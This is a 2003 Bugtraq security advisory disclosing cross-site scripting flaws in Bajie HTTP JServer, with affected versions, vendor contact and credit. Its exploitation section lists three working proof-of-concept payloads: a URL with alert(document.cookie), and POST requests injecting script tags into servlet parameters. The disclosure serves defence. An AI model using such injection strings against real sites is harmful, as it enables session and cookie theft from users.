CSS Vulnerability in Bajie HTTP JServer

From: Oliver Karow (Oliver.Karow_at_gmx.de)
Date: 10/16/03

Next message: Brett Moore: "Listbox And Combobox Control Buffer Overflow"

Previous message: NGSSoftware Insight Security Research: "Microsoft PCHealth 2003/XP Buffer Overflow (#NISR15102003)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: Thu, 16 Oct 2003 10:55:08 +0200 (MEST)
To: bugtraq@securityfocus.com

CSS Vulnerability in Bajie HTTP JServer
==========================

Even though the cross-site-scripting vulnerability published under BID 7344
was fixed with
Built 0.95zxe1, the current version of Bajie HTTP Jserver is still
vulnerable to
cross-site-scripting attacks.

Vulnerable versions:
====================

The latest version BajieJSrv/0.95zxv4 and probably older ones.

Exploiting:
===========

The cross side scripting vulnerability can easily be demonstrated with a web
browser:

http://localhost/cgi/bin/test.txt?>alert(document.cookie)</script>

The following css’s can be demonstrated either by inserting code into the
html-forms
with a browser,or sending via netcat a string like:

POST /servlet/custMsg?guestName=<script>alert("bang")</script> HTTP/1.0

POST
/servlet/CookieExample?cookiename=<script>alert("bang")</script>&cookievalue=&cookiepath=
HTTP/1.0

Vendor:
=======

Name: Gang Zhang (gzhangx@hotmail.com)
Homepage: http://go.to/bajie

Discovered by/Credit:
=====================

16.10.2003 Oliver Karow (oliver.karow[at]gmx.de)

-- 
NEU FÜR ALLE - GMX MediaCenter - für Fotos, Musik, Dateien...
Fotoalbum, File Sharing, MMS, Multimedia-Gruß, GMX FotoService
Jetzt kostenlos anmelden unter http://www.gmx.net
+++ GMX - die erste Adresse für Mail, Message, More! +++

Next message: Brett Moore: "Listbox And Combobox Control Buffer Overflow"

Previous message: NGSSoftware Insight Security Research: "Microsoft PCHealth 2003/XP Buffer Overflow (#NISR15102003)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]